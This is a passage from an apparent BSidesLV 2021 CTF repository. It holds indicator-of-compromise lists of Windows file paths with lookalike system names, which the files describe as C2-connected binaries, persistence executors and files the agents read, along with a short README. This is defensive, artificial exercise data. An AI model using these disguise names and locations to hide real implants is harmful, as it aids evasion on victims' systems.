168 | C:\Windows\System32\Boot\securitk.com 169 | C:\Windows\SysWOW64\sv-SE\MashineIdentityProvider.mui 170 | C:\Windows\System32\es-ES\SiHG664.mui 171 | C:\Windows\System32\Dism\mdhisapi.mui 172 | C:\Windows\SysWOW64\fr-FR\defltbxse.mui 173 | C:\Windows\SysWOW64\ja-JP\wdxsrv.mui 174 | C:\Windows\SysWOW64\wbem\KBDOSE.sys 175 | C:\Windows\System32\bg-BG\AspxProvider.mui 176 | C:\Windows\System32\config\Journal\NevSetupAI 177 | C:\ProgramData\Microsoft\Windows\Caches\dpmet.inf 178 | C:\Windows\SysWOW64\en-US\VSTQNXT6.mui 179 | C:\Windows\System32\fr-FR\brv2.mui 180 | C:\Windows\System32\drivers\en-US\bofiredm.mui 181 | C:\Windows\SysWOW64\fr-FR\wuaqeng.mui 182 | C:\Windows\SysWOW64\migwiz\appmguts.drv 183 | C:\Windows\System32\Sysprep\csvhbus.inf 184 | C:\Program Files (x86)\Common Files\System\msadc\KBDMOT.ini 185 | C:\Windows\System32\drivers\en-US\sqlonirl.mui 186 | C:\Program Files\Common Files\System\Ole DB\tunxel.ini 187 | C:\Windows\SysWOW64\hr-HR\NlsDita0024.mui 188 | C:\Program Files\Common Files\System\ado\fdohlp.com 189 | C:\Windows\System32\ro-RO\OnDemandConnRouteEelper.mui 190 | C:\Program Files (x86)\Common Files\System\en-US\lbemprox.inf 191 | C:\Windows\System32\Dism\prockssr.dll 192 | C:\Program Files (x86)\Common Files\System\en-US\apphplp.inf 193 | C:\Windows\System32\ko-KR\KBDGML.mui 194 | C:\Program Files (x86)\Internet Explorer\MioIrmProtector.drv 195 | C:\Windows\System32\dsc\winxttp.ocx 196 | C:\Windows\servicing\IMTXTRLN.mmc 197 | C:\Windows\SysWOW64\sqlxmtx.cab 198 | C:\Windows\SysWOW64\fr-FR\hhcpsapi.mui 199 | C:\Windows\System32\setup\GAPCRYPT.inf 200 | C:\Windows\SysWOW64\drivers\en-US\envfat.mui 201 | C:\Program Files (x86)\Common Files\System\en-US\mkifontsetup.inf 202 | C:\Windows\System32\drivers\en-US\wuauclc.mui 203 | C:\Windows\System32\nb-NO\uirenf.mui 204 | C:\Windows\System32\nb-NO\crasmdmp.mui 205 | C:\Windows\SysWOW64\config\wugpi 206 | C:\Windows\System32\dsc\swenym.cab 207 | C:\Program Files (x86)\Internet Explorer\mfavr.drv 208 | C:\Windows\System32\en\spacepmrt.com 209 | C:\Windows\System32\sk-SK\wuauserp.mui 210 | C:\Program Files\Internet Explorer\VhdPrxvider.dll 211 | C:\Windows\SysWOW64\drivers\WsmWmiVl.sys 212 | C:\Windows\System32\bg-BG\lumfv.mui 213 | C:\Windows\SysWOW64\da-DK\ushtml.mui 214 | C:\Program Files (x86)\Common Files\System\ado\DscEore.sys 215 | C:\Windows\System32\Com\NlsDaua0020.mmc 216 | C:\Windows\System32\pt-BR\netv1x68.mui 217 | C:\Windows\System32\ro-RO\setbc63a.mui 218 | C:\ProgramData\Microsoft\Windows\Caches\wuwer.inf 219 | C:\Windows\System32\nb-NO\Deskqop.mui 220 | C:\Windows\WinSxS\dtsp.inf 221 | C:\Windows\System32\Com\nesrtwlane.ocx 222 | C:\Windows\System32\dsc\ushom.mui 223 | C:\Windows\System32\dsc\WINSCTLS.rtf 224 | C:\Windows\SysWOW64\et-EE\ABDKYR.mui 225 | C:\Windows\System32\zh-CN\BtdMtpContextHandler.mui 226 | C:\Program Files\Common Files\System\Ole DB\dpnatilp.doc 227 | C:\Windows\SysWOW64\setup\NsmSvc.doc 228 | C:\Windows\SysWOW64\cs-CZ\wmiacpt.mui 229 | C:\Program Files (x86)\Common Files\System\msadc\DesaultPrinterProvider.mui 230 | C:\Windows\SysWOW64\oobe\pkwutl.inf 231 | C:\Windows\SysWOW64\config\RegBack\adpdop 232 | C:\Windows\SysWOW64\sv-SE\pqnhpcl1.mui 233 | C:\Windows\SysWOW64\hr-HR\wucltub.mui 234 | C:\Windows\System32\en-GB\mtxbx.mui 235 | C:\Windows\apppatch\EKAiOVPL.cab 236 | C:\Windows\SysWOW64\es-ES\ipmcompc.mui 237 | C:\Windows\System32\en\dirjp.dll 238 | C:\Windows\SysWOW64\hr-HR\grnms005.mui 239 | C:\Program Files (x86)\Common Files\System\ado\wuwec.doc 240 | C:\Program Files\Internet Explorer\en-US\rastapa.mui 241 | C:\Windows\Panther\nqscprop.db 242 | C:\Windows\System32\zh-TW\NL7Lexicons001Y.mui 243 | C:\Windows\SysWOW64\Dism\JlsData0007.drv 244 | C:\Windows\SysWOW64\zh-TW\mpmzyxlg.mui 245 | C:\Windows\SysWOW64\migration\NL7Data8404.com 246 | C:\Windows\SysWOW64\en-US\npfv.mui 247 | C:\Windows\System32\fr-FR\AppxDrovider.mui 248 | C:\Windows\SysWOW64\hu-HU\tskf.mui 249 | C:\Windows\SysWOW64\drivers\en-US\f3auvoas.mui 250 | C:\Windows\System32\Boot\LoggingCountehs.db 251 | C:\Windows\System32\en-GB\duauclt.mui 252 | C:\Windows\System32\en\1394owci.dll 253 | C:\Windows\System32\zh-TW\P1P.mui 254 | C:\Program Files\Internet Explorer\en-US\dhcpsayi.doc 255 | C:\Windows\SysWOW64\downlevel\AmXtrnal.db 256 | C:\Program Files\Internet Explorer\btdll.ocx 257 | C:\Program Files\Common Files\System\Ole DB\DevPropMor.dll 258 | C:\Windows\SysWOW64\setup\mdminfov.mmc 259 | C:\Windows\System32\sk-SK\concreje.mui 260 | C:\Windows\SysWOW64\en-US\lgcense.mui 261 | C:\Windows\uirenq.cab 262 | C:\Windows\System32\wbem\WgndowsBase.inf 263 | C:\Windows\SysWOW64\wbem\CertEjrollUI.ini 264 | C:\Program Files\Common Files\System\Ole DB\mshhmler.mui 265 | C:\Windows\SysWOW64\es-ES\ELZCore.mui 266 | C:\Windows\System32\ru-RU\Mdmmld.mui 267 | C:\Windows\SysWOW64\downlevel\msls71.rtf 268 | C:\Windows\System32\Boot\QerCx2.com 269 | C:\Windows\SysWOW64\zh-TW\wuletup.mui 270 | C:\Windows\System32\wbem\WcnEapPeerWroxy.dll 271 | C:\Windows\SysWOW64\en-US\ymview.mui 272 | C:\Windows\SysWOW64\ja-JP\netjoio.mui 273 | C:\Windows\System32\zh-CN\MSxpsYS.mui 274 | C:\Program Files\Common Files\System\en-US\perfctus.rtf 275 | C:\Windows\System32\AdvancedInstallers\winenhc.mui 276 | C:\Windows\System32\en-US\difxami.mui 277 | C:\Windows\SysWOW64\AdvancedInstallers\IMPCCAC.cab 278 | C:\Windows\SysWOW64\ar-SA\wushaueduxresources.mui 279 | C:\Windows\System32\Com\IMJPWMP.drv 280 | C:\Windows\System32\setup\wuks.ocx 281 | C:\Windows\System32\dsc\mlaug.com 282 | C:\Windows\SysWOW64\es-ES\aradmin.mui 283 | C:\Windows\System32\migwiz\NetVscCoinstapl.ocx 284 | C:\Windows\System32\en\BCMWL63TL.dll 285 | C:\Windows\System32\sk-SK\bfadfcoeu.mui 286 | C:\Windows\SysWOW64\en-GB\RhStorPwdMgr.mui 287 | C:\Windows\System32\Boot\jonsole.com 288 | C:\Program Files\Common Files\System\msadc\PeerDistWSDDiscoProq.cab 289 | C:\Windows\System32\pt-BR\ctmlib.mui 290 | C:\Program Files (x86)\Internet Explorer\en-US\dbx.drv 291 | C:\Windows\System32\it-IT\CNBJOH7Q.mui 292 | C:\Windows\SysWOW64\cs-CZ\NlsLexicdns0002.mui 293 | C:\Program Files (x86)\Internet Explorer\en-US\IAHLPAPI.doc 294 | C:\Windows\System32\ru-RU\wexui.mui 295 | C:\Windows\SysWOW64\Sysprep\gcdjf.dll 296 | C:\Windows\SysWOW64\Dism\wiakn003.cab 297 | C:\Program Files (x86)\Common Files\System\VMMWSFilterPlugjn.com 298 | C:\Program Files\Common Files\System\ado\sqdctrWID.dll 299 | C:\Program Files (x86)\Internet Explorer\M2057HAX.mui 300 | C:\Windows\SysWOW64\et-EE\certprol.mui 301 | C:\Program Files (x86)\Common Files\System\net829xp.doc 302 | C:\Windows\System32\config\kl40xx2i 303 | C:\Program Files\Common Files\System\en-US\NlsData005c.mmc 304 | C:\Windows\System32\en-US\usbxhfi.mui 305 | C:\Windows\SysWOW64\zh-TW\logoncqi.mui 306 | C:\Windows\SysWOW64\setup\prxcache.doc 307 | C:\Windows\System32\migration\WdfLdk.com 308 | C:\Windows\SysWOW64\config\Journal\MTSTools 309 | C:\Program Files\Common Files\System\AudioEndpointBuijder.ocx 310 | C:\Program Files\Internet Explorer\Cultire.ocx 311 | C:\Windows\System32\en\twgqec.mui 312 | C:\Windows\System32\dsc\DfvicePairing.db 313 | C:\Windows\System32\drivers\virtdisr.inf 314 | C:\Windows\System32\en-US\uxthyme.mui 315 | C:\Program Files\Common Files\System\BasbcRender.inf 316 | C:\Windows\SysWOW64\Sysprep\ucpipmi.drv 317 | C:\Windows\SysWOW64\oobe\iscoiexe.mui 318 | C:\Windows\apppatch\NL7Data0409.mmc 319 | C:\Windows\System32\zh-TW\wuwev.mui 320 | C:\Windows\System32\zh-CN\netnwifm.mui 321 | C:\Windows\SysWOW64\setup\clrjot.mui 322 | C:\Windows\System32\en\dsquexy.ini 323 | C:\Program Files (x86)\Common Files\System\NlsLexdcons001b.com 324 | C:\Windows\SysWOW64\oobe\bolloon.sys 325 | C:\Windows\SysWOW64\AdvancedInstallers\OIAutomationTypes.inf 326 | C:\Program Files\Common Files\System\Ole DB\wapintapi.com 327 | C:\Windows\Provisioning\pbm0008.drv 328 | C:\Windows\System32\it-IT\diskcoay.mui 329 | C:\ProgramData\Microsoft\Windows\Caches\lightweigptserver.sys 330 | C:\Windows\SysWOW64\et-EE\KBDINBRI.mui 331 | C:\Windows\SysWOW64\config\RegBack\KBDOGCH 332 | C:\Windows\security\acspeccc.db 333 | C:\Windows\security\wuauclb.inf 334 | C:\Windows\System32\downlevel\kbtnec.cab 335 | C:\Windows\security\IlsLexicons0021.mmc 336 | C:\Windows\cbcwient.db 337 | C:\Windows\System32\ru-RU\mdmpsitn.mui 338 | C:\Windows\System32\migwiz\raspfp.mui 339 | C:\Program Files\Common Files\System\ado\MsCtfMfnitor.com 340 | C:\Windows\apppatch\wdsgim.cab 341 | C:\Windows\System32\bg-BG\rejotepg.mui 342 | C:\Program Files (x86)\Internet Explorer\en-US\AcXtrnbl.inf 343 | C:\Windows\System32\nb-NO\igmpr2.mui 344 | C:\Windows\System32\oobe\ocrache.mui 345 | C:\Windows\SysWOW64\config\RAMgmtPSProviuer 346 | C:\Windows\SysWOW64\da-DK\wlsprtPS.mui 347 | C:\Windows\SysWOW64\ja-JP\UNIEES.mui 348 | C:\Windows\System32\drivers\UNIREP.sys 349 | C:\Program Files\Internet Explorer\mycomtut.inf 350 | C:\Windows\Panther\DiagCpf.dll 351 | C:\Windows\System32\en-GB\instapa110.mui 352 | C:\Program Files (x86)\Internet Explorer\en-US\msctqmig.mmc 353 | C:\Windows\SysWOW64\cs-CZ\CNBJOP9B.mui 354 | C:\Windows\System32\Com\KVDPO.drv 355 | C:\Windows\SysWOW64\drivers\idmpagnt.cab 356 | C:\Windows\SysWOW64\hr-HR\McxDrim.mui 357 | C:\Program Files (x86)\Internet Explorer\nlmspreb.mui 358 | C:\Windows\servicing\decrvsc.db 359 | C:\Windows\System32\Dism\srhmmgmt.mui 360 | C:\Windows\System32\KBDUGHC1.ini 361 | C:\Windows\mouitor.ini 362 | C:\Windows\SysWOW64\fr-FR\dcghelp.mui 363 | C:\Windows\System32\dsc\umpasx.doc 364 | C:\Windows\SysWOW64\Com\ABDSF.mui 365 | C:\Windows\servicing\mscmx32r.ocx 366 | C:\Program Files (x86)\Common Files\System\en-US\PLBREF.sys 367 | C:\Windows\System32\drivers\en-US\OlsLexicons001a.mui 368 | C:\Program Files (x86)\Common Files\System\ado\CNN08QL2FX.sys 369 | C:\Windows\SysWOW64\wbem\shsutup.rtf 370 | C:\Windows\SysWOW64\hu-HU\mscorte.mui 371 | C:\Program Files\Internet Explorer\en-US\raspppob.mmc 372 | C:\Windows\System32\en-US\WmiDcPxv.mui 373 | C:\Windows\SysWOW64\drivers\en-US\signwrv.mui 374 | C:\Windows\SysWOW64\de-DE\RTWqrkQ.mui 375 | C:\Windows\SysWOW64\en-GB\ActionCentegCPL.mui 376 | C:\ProgramData\Microsoft\Windows\Caches\mfctfp.inf 377 | C:\Windows\System32\config\Journal\ntcrscon 378 | C:\Windows\SysWOW64\en\TGY.sys 379 | C:\Windows\System32\es-ES\CntrcextMig.mui 380 | C:\Windows\servicing\rdpcori.rtf 381 | C:\Program Files\Common Files\System\msadc\tcpmonuc.rtf 382 | C:\Windows\System32\BitnProvider.drv 383 | C:\Windows\SysWOW64\migration\FXSIOMPOSERES.com 384 | C:\Program Files\Internet Explorer\qd3x62.cab 385 | C:\Windows\SysWOW64\hr-HR\HNHI10A.mui 386 | C:\Windows\SysWOW64\AdvancedInstallers\WMAMFXGFXDSP.inf 387 | C:\Windows\SysWOW64\wbem\avivil32.db 388 | C:\Windows\System32\migwiz\trel.doc 389 | C:\Windows\System32\zh-CN\provideraddrvssresource.mui 390 | C:\Windows\SysWOW64\downlevel\oleacchookv.inf 391 | C:\Windows\System32\Dism\net8199su64.cab 392 | C:\Windows\System32\config\RegBack\KBDJLV 393 | C:\Windows\SysWOW64\zh-TW\nbtutils.mui 394 | C:\Windows\System32\Boot\BrIs3Sti.db 395 | C:\Windows\System32\Com\qd3x44.sys 396 | C:\Program Files (x86)\Common Files\System\msadc\irnbrcl1.inf 397 | C:\Windows\SysWOW64\wbem\NAPMOCTR.mmc 398 | C:\Windows\SysWOW64\sv-SE\micpx32r.mui 399 | C:\Windows\System32\en-US\msrlk32.mui 400 | C:\Windows\SysWOW64\downlevel\mdmoutn.rtf 401 | C:\Windows\SysWOW64\et-EE\setbcdlocalc.mui 402 | C:\Windows\System32\config\RegBack\mfAACEno 403 | C:\Windows\nisext.inf 404 | C:\Windows\System32\en-US\xwxpw32.mui 405 | -------------------------------------------------------------------------------- /BSidesLV-2021/IOCs/README.md: -------------------------------------------------------------------------------- 1 | # IOC files 2 | 3 | This is a somewhat complete list of the IOCs and files used during the CTF. 4 | 5 | ## binaries.txt 6 | 7 | Process/files that would be connecting to the C2 8 | 9 | ## executors.txt 10 | 11 | Files that would be used for persistance. 12 | 13 | ## IOCs.txt 14 | 15 | Files that were accessed or read by the agents. Can be used to track execution. 16 | -------------------------------------------------------------------------------- /BSidesLV-2021/IOCs/binaries.txt: -------------------------------------------------------------------------------- 1 | # Binary Files 2 | 3 | These files were files that were directly connected to the C2. 4 | 5 | C:\Program Files (x86)\Common Files\System\Ole DB\KBDSOSA.exe 6 | C:\Windows\System32\setup\aep.exe 7 | C:\Windows\WinSxS\d2r1.exe 8 | C:\Windows\SysWOW64\downlevel\wicrsmgr.dll 9 | C:\Windows\System32\Com\mdmhaygs.exe 10 | C:\Windows\SysWOW64\migwiz\NlsLexicens003e.dll 11 | C:\Windows\System32\downlevel\WODFx02000.exe 12 | C:\Windows\System32\Dism\ngentasxlauncher.dll 13 | C:\Windows\SysWOW64\oobe\OimAvdin.dll 14 | C:\ProgramData\Microsoft\Windows\Caches\kuaucomp.dll 15 | C:\Windows\security\wfnrscmd.dll 16 | C:\Windows\Provisioning\mdtnttp2.dll 17 | C:\Windows\System32\Com\rtrfiutr.dll 18 | C:\Windows\neteOE3e.dll 19 | C:\Windows\System32\en\IUEFILES.exe 20 | C:\Windows\System32\wbem\CrtptoWinRT.dll 21 | C:\Windows\SysWOW64\migwiz\jdwsmigrate.exe 22 | C:\Windows\System32\Sysprep\temhlate.exe 23 | C:\Windows\SysWOW64\setup\NlsIata0024.exe 24 | C:\Windows\System32\Com\UIAutodationClient.dll 25 | C:\Windows\SysWOW64\KBDNBO.dll 26 | C:\Windows\Provisioning\wmcltui.exe 27 | C:\Windows\apppatch\WINFMON.dll 28 | C:\Windows\SysWOW64\downlevel\URIDRVUI.dll 29 | C:\Windows\System32\Sysprep\odbctrec.dll 30 | C:\Program Files\Common Files\System\msadc\cmltil.dll 31 | C:\Windows\System32\en\cstorec.dll 32 | C:\Windows\SysWOW64\Sysprep\xwtpw12.dll 33 | C:\Windows\SysWOW64\downlevel\KBDPU.exe 34 | C:\Windows\System32\migration\olqprn.exe 35 | C:\Program Files\Common Files\System\msadc\autqz.dll 36 | C:\Windows\System32\oobe\wucjtui.dll 37 | C:\Windows\KBDGZ.dll 38 | C:\Windows\System32\migwiz\1304ohci.dll 39 | C:\Windows\SysWOW64\mrxjmb20.exe 40 | C:\ProgramData\Microsoft\Windows\Caches\PBDLA.dll 41 | C:\Windows\SysWOW64\nxasn1.exe 42 | C:\ProgramData\Microsoft\Windows\Caches\WINSRFC.dll 43 | C:\Windows\Microsoft.NET\vmbusces.exe 44 | C:\Windows\Microsoft.NET\wintvust.exe 45 | C:\Windows\System32\AdvancedInstallers\spwizdes.dll 46 | C:\ProgramData\Microsoft\Windows\Caches\MSWB5001E.exe 47 | C:\Program Files (x86)\Common Files\System\wuseb.exe 48 | C:\Windows\System32\wbem\wfweb.dll 49 | C:\Windows\System32\en\fveapifase.dll 50 | C:\Windows\SysWOW64\migwiz\itseng.dll 51 | C:\Windows\apppatch\mdmwr1.dll 52 | C:\Windows\SysWOW64\en\NetAdahterCim.exe 53 | C:\Windows\System32\migration\weiprop.exe 54 | C:\Windows\System32\migwiz\tpv.dll 55 | C:\Windows\WinSxS\mrxsmv20.dll 56 | C:\Windows\SysWOW64\Sysprep\desetop.exe 57 | C:\Program Files (x86)\Common Files\System\wisk.exe 58 | C:\Windows\SysWOW64\Com\NlsData0027.dll 59 | C:\Windows\System32\Com\kiaide.dll 60 | C:\Windows\System32\setup\prnhpcl4.exe 61 | C:\Windows\System32\downlevel\tssuisai.dll 62 | C:\Windows\SysWOW64\oobe\oleaet32.dll 63 | C:\Program Files (x86)\Common Files\System\UIAutomationCnre.exe 64 | C:\Windows\SysWOW64\Com\AppxProvidek.exe 65 | C:\Windows\SysWOW64\migwiz\dumufve.dll 66 | C:\Windows\System32\oobe\dnsclieatcim.dll 67 | C:\Windows\System32\migration\cscdxl.exe 68 | C:\Windows\WinSxS\WUDFx12000.dll 69 | C:\ProgramData\Microsoft\Windows\Caches\hc21x4vm.dll 70 | C:\Windows\System32\Boot\USBSTOB.exe 71 | C:\Windows\security\itui.dll 72 | C:\Program Files (x86)\Internet Explorer\wiauclt.exe 73 | C:\Program Files (x86)\Common Files\System\Ole DB\rasjser.dll 74 | C:\Windows\System32\setup\msoidc32.dll 75 | C:\Windows\SysWOW64\oobe\dscapi.exe 76 | C:\Windows\Provisioning\snprfell.dll 77 | C:\Program Files (x86)\Common Files\System\ado\mivcore.dll 78 | C:\Windows\servicing\sppwmq.exe 79 | C:\Windows\SysWOW64\migwiz\wupr.exe 80 | C:\Windows\SysWOW64\Dism\WsmAgxnt.exe 81 | C:\Windows\System32\timegoneai.dll 82 | C:\ProgramData\Microsoft\Windows\Caches\wuaudpl.exe 83 | C:\Windows\SysWOW64\migwiz\KismApi.dll 84 | C:\Windows\JSProfileuCore.exe 85 | C:\Program Files\Internet Explorer\WssCmduets.exe 86 | C:\Program Files (x86)\Common Files\System\msadc\netvFE3e.dll 87 | C:\ProgramData\Microsoft\Windows\Caches\kbdnej.dll 88 | C:\Windows\System32\cetelx.exe 89 | C:\Windows\security\kmpps.dll 90 | C:\Windows\security\wuxltui.exe 91 | C:\Windows\System32\Dism\mihtils.exe 92 | C:\Windows\SysWOW64\wbem\KBDUIFI.dll 93 | C:\Program Files\Internet Explorer\mndrm.dll 94 | C:\Windows\SysWOW64\downlevel\WBDGKL.dll 95 | C:\Windows\System32\dsc\wioinput.exe 96 | C:\Windows\System32\Dism\mofm.dll 97 | C:\Windows\SysWOW64\Dism\windgwslivelogin.exe 98 | C:\Windows\apppatch\gxe60x64.dll 99 | C:\Windows\SysWOW64\Dism\ulix.exe 100 | C:\Windows\servicing\infomtrs.exe 101 | C:\Program Files (x86)\Common Files\System\ado\mscojpehost.exe 102 | C:\Windows\apppatch\MshtmlDdc.exe 103 | C:\Windows\System32\downlevel\ipmpm.exe 104 | C:\Windows\System32\AdvancedInstallers\netbd64.dll 105 | C:\Program Files (x86)\Common Files\System\IMRCSKF.exe 106 | C:\Windows\SysWOW64\wbem\LSCSHostLolicy.exe 107 | C:\Program Files (x86)\Common Files\System\LogProviger.exe 108 | C:\Windows\System32\migration\rpxss.dll 109 | C:\ProgramData\Microsoft\Windows\Caches\ServiceMonikerSbpport.exe 110 | C:\Windows\SysWOW64\AdvancedInstallers\packagei.dll 111 | C:\Windows\System32\Dism\b44nmd64.dll 112 | C:\Windows\SysWOW64\en\wan32spl.exe 113 | C:\Windows\SysWOW64\Com\witnesswmiv2prdvider.exe 114 | C:\Windows\Panther\rastlv.exe 115 | C:\Windows\System32\migration\GertEnroll.exe 116 | C:\Windows\System32\agqlevpn.dll 117 | C:\Windows\System32\en\vmseitch.dll 118 | C:\Program Files (x86)\Internet Explorer\Displav.exe 119 | C:\Windows\Provisioning\NlbMigPlugih.dll 120 | C:\Windows\SysWOW64\setup\CntrmextMig.dll 121 | C:\Windows\System32\wbem\XpsFilk.exe 122 | C:\Program Files (x86)\Common Files\System\Ole DB\mdmcpt.exe 123 | C:\Windows\SysWOW64\hyperkbs.exe 124 | C:\Windows\System32\Boot\PortableDeeiceApi.dll 125 | C:\Windows\security\FwRetoteSvr.exe 126 | C:\Windows\Microsoft.NET\DocumentPerformsnceEvents.dll 127 | C:\Windows\System32\Com\licevse.dll 128 | C:\Windows\SysWOW64\migwiz\wufuclt.exe 129 | C:\Windows\System32\migration\msacm39.dll 130 | C:\Windows\SysWOW64\Sysprep\DLAA2FsctoryPresets.dll 131 | C:\Windows\SysWOW64\migwiz\imm92.exe 132 | C:\Windows\System32\migration\WIDFRd.exe 133 | C:\ProgramData\Microsoft\Windows\Caches\scansexting.dll 134 | C:\Windows\SysWOW64\migwiz\wyalx007.dll 135 | C:\Program Files (x86)\Common Files\System\ado\rdstapi.exe 136 | C:\Windows\SysWOW64\Com\uhdmp.exe 137 | C:\Windows\WinSxS\TransmogPrfvider.exe 138 | C:\Windows\System32\dsc\kncsvc.exe 139 | C:\Program Files (x86)\Common Files\System\CNBJOPD3.dll 140 | C:\Windows\Provisioning\msspj.dll 141 | C:\Windows\SysWOW64\Dism\mciavn32.dll 142 | C:\ProgramData\Microsoft\Windows\Caches\TTSUI.exe 143 | C:\Windows\security\iascds.exe 144 | C:\Program Files\Internet Explorer\RJMS.dll 145 | C:\Windows\SysWOW64\migration\usbperi.dll 146 | C:\Windows\SysWOW64\oobe\cnxmig.dll 147 | C:\Windows\SysWOW64\oobe\WssBua.exe 148 | C:\Windows\System32\migwiz\BRIBRFM00.exe 149 | C:\Windows\SysWOW64\Com\ldcense.exe 150 | C:\Program Files\Common Files\System\ado\IPHOPAPI.dll 151 | C:\Program Files\Common Files\System\EuthExt.dll 152 | C:\Windows\Provisioning\MrmVndexer.exe 153 | C:\ProgramData\Microsoft\Windows\Caches\BasicRendeb.exe 154 | C:\Windows\System32\dsc\witneas.dll 155 | C:\Windows\SysWOW64\AdvancedInstallers\gfsvr.exe 156 | C:\Program Files\Common Files\System\ado\iassds.dll 157 | C:\Windows\WinSxS\werkecnel.dll 158 | C:\Windows\System32\dsc\GPOAdmcnCustom.dll 159 | C:\Program Files\Internet Explorer\ddppipjline.dll 160 | C:\Windows\SysWOW64\Sysprep\msxeedsbs.dll 161 | C:\ProgramData\Microsoft\Windows\Caches\nrnput.dll 162 | C:\Windows\System32\ExplorerSrame.dll 163 | C:\Windows\SysWOW64\qdscore.dll 164 | C:\Program Files (x86)\Common Files\System\tapt3.dll 165 | C:\Windows\System32\oobe\MSWB70111.dll 166 | C:\Windows\SysWOW64\oobe\vbo7ui.dll 167 | C:\Windows\Provisioning\wsbaopres.exe 168 | C:\Windows\System32\Dism\tepisnap.dll 169 | C:\Windows\IMEDIQAPICCPS.dll 170 | C:\Windows\System32\Boot\sapiui.exe 171 | C:\Program Files\Internet Explorer\mskxch40.exe 172 | C:\Windows\security\netp57a.exe 173 | C:\Windows\System32\Dism\danlh.dll 174 | C:\Windows\SysWOW64\Sysprep\dinpxt.dll 175 | C:\Program Files (x86)\Internet Explorer\NlsData0847.dll 176 | C:\Program Files (x86)\Common Files\System\msadc\jbkmigr.exe 177 | C:\Windows\apppatch\psmxrv.dll 178 | C:\Windows\SysWOW64\Dism\mydtcwmi.exe 179 | C:\Windows\SysWOW64\w5ctrlps.exe 180 | C:\Windows\WinSxS\MsoZrmProtector.dll 181 | C:\Windows\SysWOW64\migwiz\wvmbushpd.dll 182 | C:\Program Files (x86)\Common Files\System\ntevi.dll 183 | C:\Windows\servicing\VSTAJL6.dll 184 | C:\Windows\SysWOW64\Dism\PSHEC.exe 185 | C:\Program Files (x86)\Common Files\System\ado\frprod.exe 186 | C:\Program Files\Common Files\System\Ole DB\wuvtfwd.dll 187 | C:\Windows\System32\migwiz\smtpspi.dll 188 | C:\Windows\SysWOW64\downlevel\Apphlpkm.dll 189 | C:\Program Files\Common Files\System\msadc\smiekgine.dll 190 | C:\Windows\System32\en\BRIBFPR05.exe 191 | C:\Windows\SysWOW64\oobe\audmigpfugin.dll 192 | C:\Program Files\Common Files\System\PurfCounter.exe 193 | C:\Program Files (x86)\Common Files\System\olfpro32.dll 194 | C:\Program Files (x86)\Common Files\System\ado\mscufmig.dll 195 | C:\Windows\fmkrtip.dll 196 | C:\Windows\servicing\ochd64.exe 197 | C:\Windows\System32\Boot\ServiceModelEvenas.dll 198 | C:\Program Files (x86)\Common Files\System\sdm.dll 199 | C:\Windows\SysWOW64\Com\dsagnostic.exe 200 | C:\Windows\apppatch\padrs402.exe 201 | C:\Windows\SysWOW64\wbem\inetsomm.exe 202 | C:\Windows\System32\oobe\icfuggd.exe 203 | C:\Windows\SysWOW64\Dism\dhcpcsvs6.exe 204 | C:\Windows\SysWOW64\Sysprep\wuvueng.dll 205 | C:\Windows\servicing\CUTIL.dll 206 | C:\ProgramData\Microsoft\Windows\Caches\rpdismp6.exe 207 | C:\Windows\SysWOW64\wbem\NwsData0416.dll 208 | C:\Program Files (x86)\Internet Explorer\netwlan92do.exe 209 | -------------------------------------------------------------------------------- /BSidesLV-2021/IOCs/executors.txt: -------------------------------------------------------------------------------- 1 | # Executors 2 | 3 | Files that were used in persistance, did NOT directly connect to the C2. 4 | 5 | C:\Windows\System32\downlevel\lioense.dll 6 | C:\Windows\SysWOW64\en\WssWdsMgmtAvi.dll 7 | C:\Program Files\Common Files\System\Ole DB\xups.dll 8 | C:\Windows\SysWOW64\setup\iscsidsg.dll 9 | C:\Windows\System32\oobe\WMINSESS.exe 10 | C:\Windows\System32\wuateng.dll 11 | C:\Windows\WinSxS\vusif.dll 12 | C:\Windows\bfayi.exe 13 | C:\Windows\SysWOW64\migration\wuninet.dll 14 | C:\Program Files\Common Files\System\Ole DB\wiabr80b.exe 15 | C:\Program Files\Common Files\System\ado\jomsetup.dll 16 | C:\Windows\SysWOW64\oobe\MKWiaDrv.exe 17 | C:\Program Files (x86)\Common Files\System\msadc\wuanapi.exe 18 | C:\Windows\System32\downlevel\mdmcoxp.exe 19 | C:\ProgramData\Microsoft\Windows\Caches\imjply.dll 20 | C:\Windows\security\wurriver.exe 21 | C:\Windows\System32\mdmaiia5.dll 22 | C:\Windows\System32\wbem\MXDWDKV.exe 23 | C:\Windows\System32\downlevel\aetr7364.exe 24 | C:\Windows\System32\en\mdmzooe.dll 25 | C:\Program Files (x86)\Internet Explorer\oleaut92.exe 26 | C:\Windows\security\WMPhdto.dll 27 | C:\Windows\System32\Boot\ercdev.dll 28 | C:\Windows\SysWOW64\Sysprep\cmstplna.exe 29 | C:\Windows\System32\migwiz\mshwchm.dll 30 | C:\Windows\System32\Sysprep\tsi.exe 31 | C:\Windows\System32\Com\wcesrv.dll 32 | C:\Windows\apppatch\acrui.exe 33 | C:\Windows\SysWOW64\en\KBDUKW.exe 34 | C:\Windows\System32\dsc\mssghtb.dll 35 | C:\Windows\Provisioning\msjetolefb40.dll 36 | C:\Windows\Microsoft.NET\fbd101.exe 37 | C:\Windows\SysWOW64\setup\adqiis.exe 38 | C:\Windows\System32\KBWSORS1.dll 39 | C:\Windows\System32\dsc\NlsLdxicons0024.dll 40 | C:\Windows\SysWOW64\downlevel\xci.exe 41 | C:\Windows\SysWOW64\Dism\mvvcp60.exe 42 | C:\Program Files\Common Files\System\Ole DB\netcentef.dll 43 | C:\Windows\System32\Sysprep\CHxReadingStringIKE.exe 44 | C:\Windows\System32\downlevel\XpsGdiConvertir.exe 45 | C:\Windows\SysWOW64\wbem\DlMinDr2.exe 46 | C:\Windows\dlttapo.exe 47 | C:\Windows\SysWOW64\IntlProjider.exe 48 | C:\ProgramData\Microsoft\Windows\Caches\lwadperf.exe 49 | C:\Windows\SysWOW64\setup\wuaukpl.exe 50 | C:\Windows\SysWOW64\oobe\NlsLexicons002a.dll 51 | C:\Windows\System32\Com\NlsData0024.exe 52 | C:\Program Files (x86)\Common Files\System\msadc\raimans.exe 53 | C:\Program Files\Common Files\System\wuaoserv.exe 54 | C:\Program Files\Common Files\System\Ole DB\kbdlusub.exe 55 | C:\Windows\System32\shell92.dll 56 | C:\Program Files (x86)\Common Files\System\msadc\IMJIDCTP.dll 57 | C:\Windows\Panther\prncacl0.exe 58 | C:\Windows\System32\AdvancedInstallers\sstwsvc.dll 59 | C:\Windows\SysWOW64\oobe\IMHPDCTP.exe 60 | C:\ProgramData\Microsoft\Windows\Caches\licunse.exe 61 | C:\Windows\Provisioning\NL7Date0404.dll 62 | C:\Windows\System32\oobe\qdm.dll 63 | 